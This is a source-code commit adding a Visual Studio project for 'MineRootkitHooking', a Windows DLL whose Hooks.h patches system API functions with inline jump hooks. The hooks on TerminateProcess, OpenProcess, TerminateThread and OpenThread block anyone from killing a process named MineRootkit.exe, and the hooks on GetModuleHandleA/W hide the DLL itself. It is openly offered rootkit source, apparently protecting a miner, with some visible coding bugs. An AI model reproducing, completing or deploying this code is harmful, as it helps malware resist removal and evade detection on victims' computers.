Add files via upload

MineRootkitHooking.sln

@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.31624.102
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "MineRootkitHooking", "MineRootkitHooking.vcxproj", "{18DEF12E-67C5-45AF-BA27-91D9DAD183CB}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{18DEF12E-67C5-45AF-BA27-91D9DAD183CB}.Debug|x64.ActiveCfg = Debug|x64
+		{18DEF12E-67C5-45AF-BA27-91D9DAD183CB}.Debug|x64.Build.0 = Debug|x64
+		{18DEF12E-67C5-45AF-BA27-91D9DAD183CB}.Debug|x86.ActiveCfg = Debug|Win32
+		{18DEF12E-67C5-45AF-BA27-91D9DAD183CB}.Debug|x86.Build.0 = Debug|Win32
+		{18DEF12E-67C5-45AF-BA27-91D9DAD183CB}.Release|x64.ActiveCfg = Release|x64
+		{18DEF12E-67C5-45AF-BA27-91D9DAD183CB}.Release|x64.Build.0 = Release|x64
+		{18DEF12E-67C5-45AF-BA27-91D9DAD183CB}.Release|x86.ActiveCfg = Release|Win32
+		{18DEF12E-67C5-45AF-BA27-91D9DAD183CB}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+	GlobalSection(ExtensibilityGlobals) = postSolution
+		SolutionGuid = {6FCCCA06-2CC9-46D2-93E3-075206F70365}
+	EndGlobalSection
+EndGlobal

MineRootkitHooking/Hooks.h

@@ -0,0 +1,183 @@
+#include <Windows.h>
+#include <TlHelp32.h>
+#include <comdef.h>
+#include <bcrypt.h>
+#include <winternl.h>
+#include <Psapi.h>
+
+FARPROC OpenProcessAddr = GetProcAddress(GetModuleHandle(L"kernelbase.dll"), "OpenProcess");
+FARPROC TerminateThreadAddr = GetProcAddress(GetModuleHandle(L"kernelbase.dll"), "TerminateThread");
+FARPROC OpenThreadAddr = GetProcAddress(GetModuleHandle(L"kernelbase.dll"), "OpenThread");
+FARPROC NtQueryInformationProcessAddr = GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQueryInformationProcess");
+
+bool Hook(void* src, void* dst, int len)
+{
+    if (len < 5) return false;
+    DWORD curProtection;
+    VirtualProtect(src, len, PAGE_EXECUTE_READWRITE, &curProtection);
+    memset(src, 0x90, len);
+    uintptr_t relativeAddress = ((uintptr_t)dst - (uintptr_t)src) - 5;
+    *(BYTE*)src = 0xE9;
+    *(uintptr_t*)((uintptr_t)src + 1) = relativeAddress;
+    DWORD temp;
+    VirtualProtect(src, len, curProtection, &temp);
+    return true;
+}
+
+BOOL _stdcall HookedTerminateProcess(HANDLE hProcess, UINT uExitCode)
+{
+    FARPROC TerminateProcessAddr = GetProcAddress(GetModuleHandleA("kernelbase.dll"), "TerminateProcess");
+    WCHAR processExecutablePath[MAX_PATH + 1] = { 0 };
+    DWORD processExecutablePathSize = MAX_PATH;
+    if (!QueryFullProcessImageNameW(hProcess, PROCESS_NAME_NATIVE, processExecutablePath, &processExecutablePathSize))
+    {
+        Hook(TerminateProcess, TerminateProcessAddr, 5);
+        BOOL Result = TerminateProcess(hProcess, uExitCode);
+        Hook(TerminateProcess, HookedTerminateProcess, 5);
+        return Result;
+    }
+
+    if (!wcsstr(processExecutablePath, L"MineRootkit.exe"))
+    {
+        Hook(TerminateProcess, TerminateProcessAddr, 5);
+        BOOL Result = TerminateProcess(hProcess, uExitCode);
+        Hook(TerminateProcess, HookedTerminateProcess, 5);
+        return Result;
+    }
+    else
+    {
+        SetLastError(ERROR_ACCESS_DENIED);
+        return 0;
+    }
+}
+
+void HookTerminateProcess()
+{
+    Hook(TerminateProcess, HookedTerminateProcess, 5);
+}
+
+DWORD GetMineRootkitPID()
+{
+    HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, NULL);
+    PROCESSENTRY32 pEntry;
+    pEntry.dwSize = sizeof(pEntry);
+    BOOL hRes = Process32First(hSnapShot, &pEntry);
+    while (hRes)
+    {
+        _bstr_t b(pEntry.szExeFile);
+        if (strcmp(b, "MineRootkit.exe") == 0)
+        {
+            return (DWORD)pEntry.th32ProcessID;
+        }
+        hRes = Process32Next(hSnapShot, &pEntry);
+    }
+}
+
+HANDLE __stdcall HookedOpenProcess(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId)
+{
+    if (dwProcessId == GetMineRootkitPID() && dwDesiredAccess == PROCESS_TERMINATE | PROCESS_VM_OPERATION)
+    {
+        SetLastError(ERROR_ACCESS_DENIED);
+        return 0;
+    }
+    else
+    {
+        Hook(OpenProcess, OpenProcessAddr, 5);
+        HANDLE ProcessHandle = OpenProcess(dwDesiredAccess, bInheritHandle, dwProcessId);
+        Hook(OpenProcess, HookedOpenProcess, 5);
+        return ProcessHandle;
+    }
+}
+
+void HookOpenProcess()
+{
+    Hook(OpenProcess, HookedOpenProcess, 5);
+}
+
+FARPROC GetModuleHandleAReal = GetProcAddress(GetModuleHandle(L"kernelbase.dll"), "GetModuleHandleA");
+FARPROC GetModuleHandleWReal = GetProcAddress(GetModuleHandle(L"kernelbase.dll"), "GetModuleHandleW");
+
+HMODULE __stdcall HookedGetModuleHandleA(LPCSTR lpModuleName)
+{
+    if (lpModuleName == "MineRootkitHooking.dll")
+    {
+        SetLastError(ERROR_MOD_NOT_FOUND);
+        return 0;
+    }
+    else
+    {
+        Hook(GetModuleHandleA, GetModuleHandleAReal, 5);
+        HMODULE Result = GetModuleHandleA(lpModuleName);
+        Hook(GetModuleHandleA, HookedGetModuleHandleA, 5);
+        return Result;
+    }
+}
+
+HMODULE __stdcall HookedGetModuleHandleW(LPCWSTR lpModuleName)
+{
+    if (lpModuleName == L"MineRootkitHooking.dll")
+    {
+        SetLastError(ERROR_MOD_NOT_FOUND);
+        return 0;
+    }
+    else
+    {
+        Hook(GetModuleHandleW, GetModuleHandleWReal, 5);
+        HMODULE Result = GetModuleHandleW(lpModuleName);
+        Hook(GetModuleHandleW, HookedGetModuleHandleW, 5);
+        return Result;
+    }
+}
+
+void HookGetModuleHandle()
+{
+    Hook(GetModuleHandleA, HookedGetModuleHandleA, 5);
+    Hook(GetModuleHandleW, HookedGetModuleHandleW, 5);
+}
+
+BOOL _stdcall HookedTerminateThread(HANDLE hThread, DWORD dwExitCode)
+{
+    if (GetProcessIdOfThread(hThread) == GetMineRootkitPID())
+    {
+        SetLastError(ERROR_ACCESS_DENIED);
+        return false;
+    }
+    else
+    {
+        Hook(TerminateThread, TerminateThreadAddr, 5);
+        BOOL Result = TerminateThread(hThread, dwExitCode);
+        Hook(TerminateThread, TerminateThreadAddr, 5);
+        return Result;
+    }
+}
+
+void HookTerminateThread()
+{
+    Hook(TerminateThread, HookedTerminateThread, 5);
+}
+
+HANDLE __stdcall HookedOpenThread(DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwThreadId)
+{
+    Hook(OpenThread, OpenThreadAddr, 5);
+    HANDLE ThreadHandle = OpenThread(PROCESS_QUERY_INFORMATION, false, dwThreadId);
+    DWORD PIDOfThread = GetProcessIdOfThread(ThreadHandle);
+    CloseHandle(ThreadHandle);
+    Hook(OpenThread, HookedOpenThread, 5);
+    if (PIDOfThread == GetMineRootkitPID())
+    {
+        SetLastError(ERROR_ACCESS_DENIED);
+        return 0;
+    }
+    else
+    {
+        Hook(OpenThread, OpenThreadAddr, 5);
+        HANDLE ThreadHandle = OpenThread(dwDesiredAccess, bInheritHandle, dwThreadId);
+        Hook(OpenThread, HookedOpenThread, 5);
+        return ThreadHandle;
+    }
+}
+
+void HookOpenThread()
+{
+    Hook(OpenThread, HookedOpenThread, 5);
+}

MineRootkitHooking/MineRootkitHooking.vcxproj

@@ -0,0 +1,176 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <VCProjectVersion>16.0</VCProjectVersion>
+    <Keyword>Win32Proj</Keyword>
+    <ProjectGuid>{18def12e-67c5-45af-ba27-91d9dad183cb}</ProjectGuid>
+    <RootNamespace>MineRootkitHooking</RootNamespace>
+    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v142</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;_DEBUG;MINEROOTKITHOOKING_EXPORTS;_WINDOWS;_USRDLL;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableUAC>false</EnableUAC>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>WIN32;NDEBUG;MINEROOTKITHOOKING_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableUAC>false</EnableUAC>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>_DEBUG;MINEROOTKITHOOKING_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <Optimization>Disabled</Optimization>
+      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableUAC>false</EnableUAC>
+      <AdditionalDependencies>Ntdll.lib;%(AdditionalDependencies)</AdditionalDependencies>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+      <PreprocessorDefinitions>NDEBUG;MINEROOTKITHOOKING_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <ConformanceMode>true</ConformanceMode>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableUAC>false</EnableUAC>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClInclude Include="framework.h" />
+    <ClInclude Include="Hooks.h" />
+    <ClInclude Include="pch.h" />
+    <ClInclude Include="TerminateProcess.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="dllmain.cpp" />
+    <ClCompile Include="pch.cpp">
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
+    </ClCompile>
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>